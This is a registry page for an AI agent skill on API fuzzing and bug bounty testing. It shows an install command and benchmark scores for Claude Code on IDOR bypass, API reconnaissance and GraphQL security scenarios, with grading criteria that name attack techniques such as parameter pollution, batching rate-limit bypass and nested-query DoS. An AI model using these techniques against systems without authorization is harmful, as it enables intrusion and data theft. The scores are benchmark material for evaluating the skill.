CtrlK
BlogDocsLog inGet started
Tessl Logo

api-fuzzing-bug-bounty

This skill should be used when the user asks to "test API security", "fuzz APIs", "find IDOR vulnerabilities", "test REST API", "test GraphQL", "API penetration testing", "bug b...

Install with Tessl CLI

npx tessl i github:sickn33/antigravity-awesome-skills --skill api-fuzzing-bug-bounty
What are skills?

74

Quality

68%

Does it follow best practices?

Impact

Pending

No eval scenarios have been run

Optimize this skill with Tessl

npx tessl skill review --optimize ./skills/api-fuzzing-bug-bounty/SKILL.md
SKILL.md
Review
Evals

Evaluation results

100%

32%

IDOR Vulnerability Research Report

IDOR bypass techniques

Criteria
Without context
With context

Array ID wrap

100%

100%

JSON nested wrap

58%

100%

Double parameter pollution

100%

100%

Wildcard injection

40%

100%

Body parameter pollution

0%

100%

Email-to-numeric substitution

60%

100%

Self vs direct ID endpoint

25%

100%

Sequential ID increment

100%

100%

Technique explanations

100%

100%

Python payload construction

90%

100%

Without context: $0.5093 · 3m 2s · 20 turns · 27 in / 8,774 out tokens

With context: $0.6223 · 2m 46s · 23 turns · 286 in / 9,265 out tokens

96%

20%

API Security Assessment Plan: TravelNest Platform

API reconnaissance and multi-surface enumeration

Criteria
Without context
With context

Swagger/OpenAPI paths

100%

100%

Kiterunner mention

0%

100%

API version enumeration

100%

100%

Mobile API separate testing

100%

100%

No shared security assumption

0%

100%

X-Requested-With header

100%

100%

Historical endpoint discovery

100%

100%

Auth rate limiting check

100%

100%

Auth and unauth access

100%

50%

Auth login paths

0%

100%

Developer API surface

100%

100%

Without context: $0.4827 · 2m 56s · 20 turns · 27 in / 8,410 out tokens

With context: $0.7046 · 3m 12s · 27 turns · 290 in / 9,763 out tokens

100%

8%

GraphQL Security Assessment for SocialGraph API

GraphQL security testing methodology

Criteria
Without context
With context

Introspection query

100%

100%

Clairvoyance for disabled introspection

100%

100%

GraphQL IDOR payload

100%

100%

GraphQL injection payload

100%

100%

Batching rate limit bypass

100%

100%

Nested query DoS

100%

100%

GraphQL XSS payload

100%

100%

graphw00f fingerprinting

0%

100%

GraphCrawler or InQL

100%

100%

Payload script structure

100%

100%

Sensitive data fields

100%

100%

Without context: $0.4824 · 3m 16s · 13 turns · 15 in / 11,219 out tokens

With context: $0.5785 · 2m 59s · 20 turns · 295 in / 9,118 out tokens

Evaluated
Agent
Claude Code
Model
Claude Sonnet 4.6

Table of Contents

IDOR Vulnerability Research ReportAPI Security Assessment Plan: TravelNest PlatformGraphQL Security Assessment for SocialGraph API

Is this your skill?

If you maintain this skill, you can claim it as your own. Once claimed, you can manage eval scenarios, bundle related skills, attach documentation or rules, and ensure cross-agent compatibility.

Claim skill